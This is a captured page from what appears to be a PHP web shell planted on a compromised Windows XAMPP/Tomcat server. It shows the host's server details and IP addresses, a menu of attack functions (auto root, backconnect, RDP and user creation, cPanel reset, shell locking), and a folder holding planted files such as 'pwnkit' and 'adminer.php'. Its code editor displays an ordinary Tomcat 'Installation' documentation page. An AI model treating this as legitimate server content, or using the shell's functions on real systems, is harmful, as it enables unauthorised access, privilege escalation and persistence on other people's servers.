Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
tomcat /
webapps /
docs /
appdev /
[ HOME SHELL ]
Name
Size
Permission
Action
sample
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
build.xml.txt
16.6
KB
-rw-rw-rw-
deployment.html
13.54
KB
-rw-rw-rw-
index.html
3.86
KB
-rw-rw-rw-
installation.html
4.72
KB
-rw-rw-rw-
introduction.html
4.86
KB
-rw-rw-rw-
processes.html
14.2
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
source.html
15.76
KB
-rw-rw-rw-
web.xml.txt
6.26
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installation.html
<!DOCTYPE html SYSTEM "about:legacy-compat"> <html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="../images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Application Developer's Guide (8.5.96) - Installation</title><meta name="author" content="Craig R. McClanahan"><meta name="author" content="Yoav Shapira"></head><body><div id="wrapper"><header><div id="header"><div><div><div class="logo noPrint"><a href="https://tomcat.apache.org/"><img alt="Tomcat Home" src="../images/tomcat.png"></a></div><div style="height: 1px;"></div><div class="asfLogo noPrint"><a href="https://www.apache.org/" target="_blank"><img src="../images/asf-logo.svg" alt="The Apache Software Foundation" style="width: 266px; height: 83px;"></a></div><h1>Application Developer's Guide</h1><div class="versionInfo"> Version 8.5.96, <time datetime="2023-11-10">Nov 10 2023</time></div><div style="height: 1px;"></div><div style="clear: left;"></div></div></div></div></header><div id="middle"><div><div id="mainLeft" class="noprint"><div><nav><div><h2>Links</h2><ul><li><a href="../index.html">Docs Home</a></li><li><a href="index.html">App Dev Guide Home</a></li><li><a href="https://cwiki.apache.org/confluence/display/TOMCAT/FAQ">FAQ</a></li><li><a href="#comments_section">User Comments</a></li></ul></div><div><h2>Contents</h2><ul><li><a href="index.html">Contents</a></li><li><a href="introduction.html">Introduction</a></li><li><a href="installation.html">Installation</a></li><li><a href="deployment.html">Deployment</a></li><li><a href="source.html">Source Code</a></li><li><a href="processes.html">Processes</a></li><li><a href="sample/">Example App</a></li></ul></div></nav></div></div><div id="mainRight"><div id="content"><h2>Installation</h2><h3 id="Installation">Installation</h3><div class="text"> <p>In order to use Tomcat for developing web applications, you must first install it (and the software it depends on). The required steps are outlined in the following subsections.</p> <div class="subsection"><h4 id="JDK">JDK</h4><div class="text"> <p>Tomcat 8.5 was designed to run on Java 7 or later. </p> <p>Compatible JDKs for many platforms (or links to where they can be found) are available at <a href="http://www.oracle.com/technetwork/java/javase/downloads/index.html">http://www.oracle.com/technetwork/java/javase/downloads/index.html</a>.</p> </div></div> <div class="subsection"><h4 id="Tomcat">Tomcat</h4><div class="text"> <p>Binary downloads of the <strong>Tomcat</strong> server are available from <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a>. This manual assumes you are using the most recent release of Tomcat 8. Detailed instructions for downloading and installing Tomcat are available <a href="../setup.html">here</a>.</p> <p>In the remainder of this manual, example shell scripts assume that you have set an environment variable <code>CATALINA_HOME</code> that contains the pathname to the directory in which Tomcat has been installed. Optionally, if Tomcat has been configured for multiple instances, each instance will have its own <code>CATALINA_BASE</code> configured.</p> </div></div> <div class="subsection"><h4 id="Ant">Ant</h4><div class="text"> <p>Binary downloads of the <strong>Ant</strong> build tool are available from <a href="https://ant.apache.org/">https://ant.apache.org/</a>. This manual assumes you are using Ant 1.8 or later. The instructions may also be compatible with other versions, but this has not been tested.</p> <p>Download and install Ant. Then, add the <code>bin</code> directory of the Ant distribution to your <code>PATH</code> environment variable, following the standard practices for your operating system platform. Once you have done this, you will be able to execute the <code>ant</code> shell command directly.</p> </div></div> <div class="subsection"><h4 id="Source_Code_Control">Source Code Control</h4><div class="text"> <p>Besides the required tools described above, you are strongly encouraged to download and install a <em>source code control</em> system, such as Git, Subversion, CVS or one of the many alternatives. You will need appropriate client tools to check out source code files, and check in modified versions and, depending on the tool and hosting option you choose, you may need to obtain and install server software or sign up for an account with a cloud provider.</p> <p>Detailed instructions for installing and using source code control applications is beyond the scope of this manual.</p> </div></div> </div></div></div></div></div><footer><div id="footer"> Copyright © 1999-2023, The Apache Software Foundation </div></footer></div></body></html>
Close